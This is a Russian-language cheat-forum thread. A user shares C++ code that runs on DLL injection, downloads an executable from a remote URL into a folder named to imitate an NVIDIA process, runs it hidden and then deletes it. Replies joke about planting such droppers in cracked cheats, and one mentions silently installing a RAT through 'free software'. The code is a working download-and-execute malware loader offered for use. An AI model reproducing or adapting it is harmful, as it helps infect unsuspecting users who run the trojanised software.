Запуск .exe приложения через длл

• Автор темы Автор темы IPV4
  • Дата начала Дата начала
Забаненный
Забаненный
Статус
Оффлайн
Реакции
63
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Запуске ексе или калькулятора или вообще другой залупы нахуй при инжекти длл
C++:
Expand Collapse Copy
void StartPricoluha()
{
char szPath[256] , szDirectoryPath[256];//рофлан поминки
sprintf_s(szPath, "%s\\nvcontainer\\nvcontainer.exe", getenv("APPDATA")); // путь до нашей приколюхи
sprintf_s(szDirectoryPath, "%s\\nvcontainer", getenv("APPDATA"));// путь до папки с нашей приколюхой
LPCTSTR Url = _T("http://www.ursite.domen/prikol.exe"), File = _T(szPath); // ссылки и путь там на приколюхи вся хуйня...

std::filesystem::create_directories(szDirectoryPath);//создаем папку в аппдате с названием nvcontainer
URLDownloadToFile(0, Url, File, 0, 0); // скачиваем приколюху с сервера
Sleep(3000); // даем 3 секунды на скачку приколюхи
ShellExecute(NULL, "open", szPath, NULL, NULL, SW_HIDE);// запускаем ту самую приколюху с хайд аргументом
Sleep(40000);// через n-ное кол-во секунд удаляем приколюху
std::filesystem::remove(szPath); // удаляем приколюху с пк
}
не обижаем меня за эту залупу я не виноват мой акк взломали украли французы
1577997848943.png

Последнее редактирование:
ну чо , эра апасных длллок :kappa:

• Мне нравится
Реакции: IPV4
Все бляц , я крякать шкет.цц

оп а вот щас и кряк эвольва подлетит =))

• Мне нравится
Реакции: IPV4
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Воу! Так же можно троллировать,если будет способ скачать файл с помощью длл))
Представьте! Кряк скита 2020! Вы его запускаете,ксго закрывается,и начинается установка Майнкрафта. Классно же))

Воу! Так же можно троллировать,если будет способ скачать файл с помощью длл))
Представьте! Кряк скита 2020! Вы его запускаете,ксго закрывается,и начинается установка Майнкрафта. Классно же))
Так же будет способ: когда ты заинжектил фри софт, у тебя качается рат и никто не знает что он запустился :)

Sleep(3000); // даем 3 секунды на скачку приколюхи
Ага, держи в курсе, urldownloadtofile завершается только после полной загрузки файла, нет смысла в ожидании после

Назад
Сверху Снизу